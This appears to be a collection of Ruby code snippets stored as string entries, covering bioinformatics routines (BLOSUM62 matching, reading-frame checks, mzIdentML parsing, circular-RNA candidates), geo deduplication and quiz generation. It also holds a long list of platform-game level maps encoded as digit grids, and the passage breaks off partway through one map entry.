"def remove_duplicates_full (temp_geo)\n geo_full_final=Array.new\n indexes=Array.new\n i=1 \n while temp_geo[i]\n j=i-1\n \tuntil j==0\n \t if temp_geo[i][:long]==temp_geo[j][:long] && temp_geo[i][:lat]==temp_geo[j][:lat]\n \t\t unless indexes.include? i\n \t\t indexes.push(i) \n \t \t end\n \t \tbreak\n \t else\n \t j-=1\n \t end \n \tend \n \t i+=1\n end\n\t p \"loading uniq data\"\n\t i=0\n\t while indexes[i]\n \t\t unless indexes.include?(i)\n\t\t\t geo_full_final.push(temp_geo[i])\t\t\n \t\t end\t\n \t i+=1\n\t end\ngeo_full_final\nend",
"def match(i, j, protein)\n twin = [protein.sequence[i-1], @genome.sequence[j-1]].sort\n st = twin.join\n @@blosum62[st]\n end",
"def reading_frame_validation(lst = @hits)\n\n rfs = lst.map{ |x| x.hsp_list.map{ |y| y.query_reading_frame}}.flatten\n frames_histo = Hash[rfs.group_by { |x| x }.map { |k, vs| [k, vs.length] }]\n #rez = \"\"\n rez={}\n frames_histo.each do |x, y|\n #rez << \"#{x} #{y}; \"\n rez[x]=y\n end\n\n # if there are different reading frames of the same sign\n # count for positive reading frames\n count_p = 0\n count_n = 0\n frames_histo.each do |x, y|\n if x > 0\n count_p = count_p + 1\n else \n if x < 0\n count_n = count_n + 1\n end\n end\n end\n\n if count_p > 1 or count_n > 1\n answ = \"INVALID\"\n else\n answ = \"VALID\"\n end\n\n @reading_frame = rez \n return [answ, rez]\n end",
"def cache_ids()\n hit_values = File.open(@mzid_file) do |io|\n doc = Nokogiri::XML.parse(io, nil, nil, Nokogiri::XML::ParseOptions::DEFAULT_XML | Nokogiri::XML::ParseOptions::NOBLANKS | Nokogiri::XML::ParseOptions::STRICT)\n doc.remove_namespaces!\n root = doc.root\n \n cache_db_seq_entries(root)\n cache_pep_ev(root)\n \n peptide_lst = root.xpath('//Peptide')\n @pep_h = Hash.new\n @mod_h = Hash.new\n peptide_lst.each do |pnode|\n \n pep_id = pnode['id']\n pep_seq = get_peptide_sequence(pnode)\n mod_line = get_modifications(pnode)\n @pep_h[pep_id] = pep_seq \n @mod_h[pep_id] = mod_line \n end\n \n end\n end",
"def unmatched_keys; end",
"def createIncorrectAns(min, max, correctHash, nOfAnswers, error)\n\tincorrectHash = {}\n \twhile incorrectHash.length < nOfAnswers\n \t\tincSum = -1\n \t\twhile incSum <= 0 || incSum == correctHash\n \t\t\tincSum = correctHash + rand(-error..error)\n \t\tend\n\n\t \t# -- Check for repeating answers -- #\n\t \tif !incorrectHash.has_value?(incSum)\n\t\t\tincorrectHash[\"incorrect\" + incorrectHash.length.to_s] = incSum\n\t\tend\n \tend\n \treturn incorrectHash\nend",
"def unique_visit\n parsed_result.each do |result|\n visit_hash[result.first] = result.last.uniq.count\n end\n visit_hash.sort_by{|k,v| v}.reverse.to_h\n end",
"def final_candidates(before, after, output_file)\n\t\tcandidates = {}\n\t\tall_ids = {}\n\n\t\t# Read circular candidates into hash\n\t\tFile.open(before, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tpos = [line[0..1], line[3..4]].join(':')\n\t\t\tread_count = line[6].to_i\n\t\t\tqname = line[-1].split(';')\n\t\n\t\t\t# Create qname index to make search faster\n\t\t\t# Remark 2\n\t\t\tqname.each do |q|\n\t\t\t\tk1, k2 = q.split(':')[3..4]\n\t\t\n\t\t\t\tall_ids[k1] = {} if !all_ids.has_key?(k1)\n\t\t\n\t\t\t\tif !all_ids[k1].has_key?(k2)\n\t\t\t\t\tall_ids[k1][k2] = [q]\n\t\t\t\telse\n\t\t\t\t\tall_ids[k1][k2] << q\n\t\t\t\tend\n\t\t\tend\n\n\t\t\tcandidates[pos] = {:counts => read_count, :qnames => qname}\n\t\tend\n\n\t\t# Read remapped readpairs and compare them to initial candidates\n\t\tFile.open(after, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tqname = line[0]\n\t\t\tpos = [line[1..2], line[3..4]].join(':')\n\t\t\tk1, k2 = qname.split(':')[3..4]\n\n\t\t\tread_unused = (!all_ids.has_key?(k1) || !all_ids[k1].has_key?(k2) || !all_ids[k1][k2].include?(qname)) \n\t\t\t\t\t\t\n\t\t\t# Add read if read is not already used (condition 2)\n\t\t\tif candidates.has_key?(pos) && read_unused \n\t\t\t\tcandidates[pos][:counts] += 1\n\t\t\t\tcandidates[pos][:qnames] << qname\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput.puts %w(chr pos_a chr_b pos_b readCounts qnames).join(\"\\t\")\n\t\n\t\t\tcandidates.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:counts], v[:qnames].join(';')].join(\"\\t\")\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Final candidate list finished.\"\n\tend",
"def cambioRondas(n)\n rond=@mapaactual[@mapaactual.keys[2]]\n @mapaactual[@mapaactual.keys[2]]=rond+n\n @mapaactual\n end",
"def trial_maps\n [\n Map.new(\n name: 'San Francisco',\n data: 'color_ff7575-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000004000000000000000000000000000000000000000000000000000000000000000_00000000000004004004000000000000000000000000000000000000000000000000000000000000_00000000000000404040000000000000000000000000000000000000000000000000000000000000_00000000000000040400000000000000000000000000000000000000000000000000000000000000_00000110000044404044400000000000000000000000000000000000000000000000000000000000_00011111100000041400000000000000000000000000000000000000000000000000000000000000_00011111100000401040000000000000000000000000000000000000000000000000000000000000_00011000100004001004000000000000000000000000000000000000000000000000000000000000_00011111100000011100000000000000000000000000000000000000000000000000000000000000_00010010100000011100000000000000000000000000000044000000000000000440000000000000_00011111100000011100000000000000000000000000000011000000000000000110000000000000_00011111100000011100000000000000000000000000000011000000000000000110000000000000_00010011100000111110000000000000000000000000001011010000000000010110100000000000_04011111100000111110000000000000000000000000001011010000000000010110100000000000_44411010110000110010001110000000000000000000101011010100000001010110101000000000_14411111111100111110011111000000000000000010101011010100000001010110101010000000_11111111111101111111011101000000000000001010101011010101000101010110101010100000_11111011110111110011111111000000000000101010101011010101010101010110101010101003_11111111111110111111111111110000000010101010101011010101010101010110101010101011_11111111111111111111010011111444111111111111111111111111111111111111111111111111_11111111111111111111111111011110000001110000000011000000000000000110000000001111_11111111441111000111111111111111000001110000000011000000000000000110000000011111_11000111001101111111111144111111110111111110000011000000000000000110000000111111_11020000000000001111000000011111110111111110000011000000000000000110000001111111_11111111111111000000000011000000000111111110000011000000000000000110000001111111_11111111111111111111111111111111111111111110000111100000000000001111000001111111',\n skill_mean: 1,\n ),\n Map.new(\n name: 'The Bunker',\n data: 'color_8a8a5c-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000001000000000000000000000000000000000000000000000000000000000000000000000000_02000011000000100000000000000000000000000000000000000000000000000000000000000001_11111111111000110000000000000000000000000000000000000000000000000000000000101111_11111111111111111101000000000000000000000000000000000000000000000010001111111111_11111111111111111111111000000000000000000000000000100000010001111111111111111111_11111111111111111111111110100000001111011110000001100001111111111111111111111111_11111111111111111111111111111000111550005511111111111111111111111111111111111111_11111111111111111111111111111111111550005511111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111111111111111111111111111111111_11111111111111111111111111111111111150005111111111110000000111111111111111111111_11111111111111111101111111111111111150005111111111100000000011111111111111111111_11111111111111111111000000011111111150005111111111000111110001111111111111111111_11111111111111111111000000001111111150005111111110001111111000111111111111111111_11111111111111111111001111000111111150005111111100011111111100011111111111111111_11111111111111111111011111100011101150005110111000111111100110001111111111111111_11111111111111111111001111110001111150005111110001111111100011000001111111111111_11111111111111111111011111111000111150005111100011111111100001100001111111111111_11111111111111111111001111111100001150005110000111111111100000111001111111111111_11111111111111111111011111111110001150005110001111111100000000000001111111111111_11111111111111111111001111111111101150005110111111111000000000000001111111111111_11111110111111111101011111111111101100000110111111110001111111111111111111111111_11111111111111111111001111111101101100000110101111100011011111111111111111111111_11111111100000000000011111111111101100000110111111000111111111111111111111111111_11111111100000004000001111111111101100000110111000001100111111111111111111111111_11111111000000044400011111111111101100000110111000011000111111111111111111111111_10111110000000444444001111111111101000000010111000110000111111111111111111111111_11111100100000444444401111111111100000000000111011100000000011111111111111111111_11000001111111111111111111111111111100000111111000000000000001111111111111111111_11000011111111111111111111111111111100000111111111111111111000111111111111111111_11000011111111111110111111111110111100000111101111111111011100011111111111111111_11000001111111111111111111111111111100000111111111111111111110001111111111111111_11111100100000000011100000000011100000000000111000000001110011000001111111111111_10111110000000000011100000000011100000000000111000000001110001100001111111111111_11111111000000000511100000440011100000000000111000000001110000111001111111111111_11111111100003000551000000444001000000000000010000000000100000000001111111111111_11111111100011105555500004444400000000000000000000000000000000000001111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 2,\n ),\n Map.new(\n name: 'Caravel Ships',\n data: 'color_4d94ff-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000400000000000000000000000_00000000000000000000000000000000000000000000000000400000100000000000000000000000_00000000000000000000000000000000000000000000000000100000100000000000000000000000_00000000000000000000000000000000000000000000000000100000100000000040000000000000_00000000000000000000000000000000000000000000000001100001100000000010000000000000_00000000000000000000000000000000000000000000000011100011100000000010000000000000_00000000000000000000000000000000000000000000000110100110100000000110000000000000_00000000000000000000000000000000000000000000001110100110100000001110000000000000_00000000000000000000000000000000000000000000001100101110100000001110000000000000_00000000000000000000000000000000000000000000011100101110100000011010000000000000_00000000000000000000000000000000000000000000011100101110100000011010000000000000_00000000000000000000000000000000000000000000011100101110100000011010000000000000_00000000000100000000000000000000000000000000001100100110100000111010000000000000_00000000001110001000000000000000000000000000001110100110100000111010000000000000_00000010000111011100000000000000000000000000001110100110100000111010000000000000_00000111000111001110000000000000000000000000000110100010100001111010000000000000_00000011000111001110000000000000000000000000000111100011100011111111000000000000_00000011000111001110000000000000000000000000000001100001100000000110000000000000_00000011000110001100000000000000000000000000000001100001100000000010000000000000_00000011000110001100000000000000000000000000000000100000100000000011100000000000_00000010000100001000000000000040000000111114444444144444144444444411100000000000_00001110000100001002000000004444000000000111111001111111111111001111110000000000_00001110000100011111100001111444111000000011100011100011100011100511100000000030_00001111111111111110000001111111110000000011100111140011100411110511100000011111_55551111111111111155555555111111155555555551100004444000004444000011155551111111_55555511111111111555555555555555555555555555111111144411144411111111555511111111_55555555555555555555555555555555555555555555551111111111111111111111555511111111_55555555555555555555555555555555555555555555555555555555555555551155555111111111_55555555555555555555555555555555555555555555555555555555555555555555551111111111',\n skill_mean: 3,\n ),\n Map.new(\n name: 'Tower in the Castle',\n data: 'color_c2e0ff-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00050000000000000000000000000000000000000000000000000000000000000000000000000000_00010000000050000000000000000000000000000000000000000000000000000000000000000000_00010000000010000000000000000000000000000000000000000000000000000000000000000000_00515000000010000000500000000000000000000000000000000000000000000000000000000000_00111000000515000000100000000000000000000000000000000000000000000000000000000000_00111000000111000000100000000000000000000000000000000000000000000000000000000000_05111500000111000005150000000000000000000000000000000000000000000000000000000000_01111100005111500001110000000000000000000000000000000000000000000000000000000000_51111150001111100001110000000000000000000000000000000000000000000000000000000000_11111110051111150051115000000000000000000000000000000000000000000000000000000000_00111000011111110011111000000000000000000000000000000000000000000000000000000000_00111000000111000511111500000000000000000000000000000000000000000000000000000000_00111000000111000111111100000000000000000000000000000000000000000000000000000000_00111000000111000001110000000000000000000000000000000000000000000000000000000000_00111000000111000001110000000000000000000000000000000000000000000000000000000000_00101000000000000000000000000000000000000000000000000000000000000000000000000000_00100011111111000000301000000000000000000000000000000000000000000000000000000000_00100110111111111111111000000000000000000000000000000000000000000000000000000000_00001110111111111111111000000000000000000000000000000000000000000000000000000000_00011010111110000051115000000000000000000000000000000000000000000000000000000000_10001010111100000005150000000000000000000000000000000000000000000000000000000000_11100010111100000000100000000000000000000000000000000000000000000000000000000000_10110010111100000000500000000000000000000000000000000000000000000000000000000000_10011000111100000000000000000000000000000000000000000000000000000000000000000000_10001100111100000000000000000000000000000000000000000000000000000000000000000000_10100001111100000000000000000000000000000000000000000000000000000000000000000000_10100011111100000000000000000000000000000000000000000000000000000000000000000000_10100110111100000000000000000000000000000000000000000000000000000000000000000000_10101110111100000000000000000000000000000000000000000000000000000000000000000000_11100010111100000000000000000000000000000000000000000000000000000000000000000000_11110010111100000000000000000000000000000000000000000000000000000000000000000000_11111000111100000110110110000000001101101100000000000000000000000000000000000000_11111100111100000111111110000000001111111100000000000000000000000000000000000000_10101110111110000111111110000000001111111100000001000010000000000000000000000000_10101000111110000111111110000000001111111100000001000010000000000000000000000000_10100011111100000001111000000000000011110000000011000011000000000000000000000000_10100110111001101101111011011011011011110000000010000001000000000000000000000000_10001100110011111111111111111111111111110000000110000001100000000000000000000000_10011000100111111111111111111111111111110000000100000000100000000000000000000000_10110000001100000401111101111111110111110000001100000000110000000044000004000000_10000000011100000441111101111511110111110000001000000000010000000444000044400000_11110000111100404441111111115551111111110000011000000000011000000440000044000000_10111000111100444441111111115551111111110000010000000000001000000040000004000000_10101100000004444411111111115551111111111100110000000000001100000040000004000020_10101111111111111111111111115551111111111111110000000000001111111111111111111111_11111111111111111111111111111111111111111111110000000000001111111111111111111111_11111111111111111111111111111111111111111111110000000000001111111111111111111111_11111111111111111111111111111111111111111111110000000000001111111111111111111111',\n skill_mean: 5,\n ),\n Map.new(\n name: 'Cat Mountain Climb',\n data: 'color_f1f1fa-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000003000000000000000000000000000000000000000000000000000000000000_00000000000000000011110000000000000000000000000000000000000000000000000000000000_00000000000000000001111000000000000000000000000000000000000000000000000000000000_00000000000000000000111100000000000000000000000000000000000000000000000000000000_00000000000000000000011114400000000000000000000000000000000000000000000000000000_00000000000000000000011111100000040000000000000000000000000000000000000000000000_00000000000000000000001111100000044000000000000000000000000000000000000000000000_00000000000000000000001111100000011000000000000000000000000000000000000000000000_00000000000000000000001111110000111000000000000000000000000000000000000000000000_00000000000000000000001111110001111100000000000000000000000000000000000000000000_00000000000000000000004111111001111100000000000000000000000000000000000000000000_00000000000000000000000111111101111110000000000000000000000000000000000000000000_00000000000000000000000111111101111110000000000000000000000000000000000000000000_00000000000000000000000411111111111111000000000000000000000000000000000000000000_00000000000000000000000011111111111111100000000000000000000000000000000000000000_00000000000000000000000001111111111111111000000000000000000000000000000000000000_00000000000000000000000001111111111111111100000000000000000000000000000000000000_00000000000000000000000001111111111111111110000000000000000000000000000000000000_00000000000000000000000000000000111111111111100000000000000000000000000000000000_00000000000000000000000001111100111111111111111100000000000000000000000000000000_00000000000000000000000001111100000111111111111111000000000000000000000000000000_00000000000000000000000001111110000111111100000111110000000000000000000000000000_00000000000000000000000011111111000111444400000000111000000000000000000000000000_00000000000000000000000011111111100000000000000000011000000000000000000000000000_00000000000000000000000011111111100000000000000000001100000000000000000000000000_00000000000000000000000011111111110000000000000000000110000000000000000000000000_00000000000000000000000011111111111111111111100111100110000000000000000000000000_00000000000000000000000011111111111111111111000011000110000000000000000000000000_00000000000000000000000011111111111111111111000011000111000000000000000000000000_00000000000000000000000011111111111111111111000015000511000000000000000000000000_00000000000000000000000011111111111111111111500511000511000000000000000000000000_00000000000000000000000011111111111111111111555511000511000000000000000000000000_00000000000000000000000111111111111111111111155515000511000000000000000000000000_00000000000000000000000111111111111111111111155115000511000000000000000000000000_00000000000000000000000111111111111111111111155111000511100000000000000000000000_00000000000000000000000111111111111111111111111111100511100000000000000000000000_00000000000000000000000111111111111111111111111111100001100000000000000000000000_00000000000000000000000111111111111111111111111111111001100000000000000000000000_00000000000000000000000111111111111111111100001101111001110000000000000000000000_00000000000000000000000111111111111111111000000000100000110000000000000000000000_00440000000000000000000111111111111111111000000000000000110000000000000000000000_00414000000000000000000111111111111111110000000000000001110000000000000000005000_00411400000000000000001111111111111111110000000000111111110000000000000000005000_00411140000000000000001111111111111111110005511111111111110000000000000005055500_00411110000000000000001111111111111111100011111111111111110000000000000005550500_00411100000000000000011111111111111111100011000001000000010000000000000000555500_00411000000000000000111111111111111111100000000000000000000000000000000055555500_00410000000000000000111111111111111111110000400000000111100000000000000000055550_00410000000000000011111111111111111111110004440004411111110000000000005000050000_00410000000000001111111111111111111111111044444441111111111000000000005500505550_00410000000000011111111111111111111111111444444411111111111100000000055000005000_00410000000000111111111111111111111111111111111111111111111111000000005000005000_00410000001111111111111111111111111111111111111111111111111111111000005000005000_00410200111111111111111111111111111111111111111111111111111111111111111000005000_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 7,\n ),\n Map.new(\n name: 'Welcome',\n data: 'color_85e085-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000444000000000000000000000000000000000000000000_00000000000000000000000000444000000000000000000000000000000000000000000000000000_00000000000000000444000000000000000000000000000000000000000000000000000100010000_00000000444000000000000000000000000000000000000000000055500000000000001100011000_02000000000000000000000000000001100000000000555000000000000000005555511100011155_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_55555555555555555555555555555555555555555555555555555555555555555555555500055555_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_01100100011101100101000011101101100000110101011101001001000110101100100001110110_01110110011101110111000011001101110000100111011101001001100111101110110001100010_01010111010101100010000010001101010000110101010101101101110101101110111011100110_00000000000000000000000000000000000000000000000000000000000000000000000000000100_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000100_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00001000100000000000000000000000000000000000000000000000000000000000000000000000_00011000110000000000000000000000000000000000000000000000000000000000000000000000_55111000111555555555555555555555555555555555555555555555555555555555555555555555_11111000111111111111111111111111111111111111111111111111111111111111111111111111_11111000111111111111111111111111111111111111111111111111111111111111111111111111_11111000111111111111111111111111111111111111111111111111111111111111111111111111_11111000111111111111111111111111111111111111111111111111111111111111111111111111_55555000555555555555555555555555555555555555555555555555555555555555555555555555_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_01001010001001101100110010000011101100010110101110101011101100111011101011011010_01111011001001001101111011000001001100010111101100101001001110111001001011011110_00110011101101101101001011100001001100010101101000101101001010101001001011010110_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000100010000_00000000000000000000000000000000000000000000000000000000000000000000001100011000_55555555555555555555555555555555555555555555555555555555555555555555511100011155_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111103011111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 8,\n ),\n Map.new(\n name: 'Moonlit Woods',\n data: 'color_944d94-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000440000000000000000000_00000000000000000000000000000000000000000000000000000000044440000000000000000000_00000000000000000000000000000000000000000000000000000000004140000000000000000000_00000000000000000000000000000000000000000000000000004400000110000000000000000000_00000000000000000000000000000000000000000000000000000440000510000440000000000000_00000000000000000000000000000000000000000000000000000444000510000444000000000000_00000000000000000000000000000000000000000000000000000411000010000410000000000000_00000000000000000000000000000000000000000000000000000441100010000114400000000000_00000000000000000000000000000000000000000000000000000000110010001100000000000000_00000000000000000000000000000000000000000000000004440000110011001000000044440000_00000000000000000000000000000000000000000000000000144000011001011000000444440000_00000000000000000000000000000000000000000000000000104000011101110000000014400000_00000000000000000000000000000000000000000000004040114400051155100000001114000000_00000000000000000000000000000000000000000000000111114400005155150001111000000000_00000000000000000000000000000000000000000000000004111000000151151111000004440000_00000000000000000000000000000000000000000000000004011110000001151110000000140000_00000000000000000000000000000000000000000000000000040111000001100000000001140000_00000000000000000000000000000000000000000000000444000011110001110000011111000000_00000000000000000000000000000000000000000000044444000001111000110000111100000000_00000000000000000000000000000000000000000000000011000044011110110111110000004000_00000000000000000000000000000000000000000000000441100000001110110111100000044400_00000000000000000000000000000000000000000000000001111000000110110110000041444140_00000000000000000000000000000000000000000000000000111100000000110000000441011100_00000000000000000000000000000000000000000000000000111100000000110000004011110000_00000000000000000000000000000004440000000000000001100111111101111000001111114440_00000000000000000000000000000044400000000000000011500011111101111011111110011140_00000000000000000000000000000444000000000000000000500005151101111011111150050000_00000000000000000000000000000444000000000000000000500000050001111011550050000000_00000000000000000000000000000444000000000000000000000000000001111000500000000000_00000000000000000000000000000444000000000000000000000000000001111000000000000000_00000000000000000000000000000044400000000000000000000000000001101100000000000000_00000000000000000000000000000004440000000000000000000000000001130000000000000000_00000000000000000000000000000000000000000000000000000000000001111000000000000000_00000000000000000000000000000000000000000000000000000000000001111000000000000000_00000000000000000000000000000000000000000000000000000000000001111000000000000000_00000000000000000000000000000000000000000000000000000000000001111000000000000000_00000000000000000000000000000100000000000000000000000000000001111000000000000000_00000000000000001000000000000110000000000100000000000000010001111100000100101000_00000000000000001100010010101111010001010110000010000100010101111110010110101001_00000000000100011100010111101111010011111110000011001110111151111111111111111011_00000000001100011110110111111111111011111110000011001110111111111111111111111111_00000000011100011110111111111111111111101111000011101111111111111511111111111101_00000000011100111111111111101111111111111111000011111111111111111111111511111111_00000000111110111010110111111101111111110111000111111111115111111111111111111111_00000000101110111110111111111111111111111111100111111111111111111111111111111111_00000000111110001000010010100111010111111111000011110105111111111515511515111010_00000000001000501050010515150101010001010010055551515155515151111515515515151510_02000055551555551555515515155151515551515515555551515155515151111115515515151515_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 10,\n ),\n Map.new(\n name: 'Egypt Pyramid',\n data: 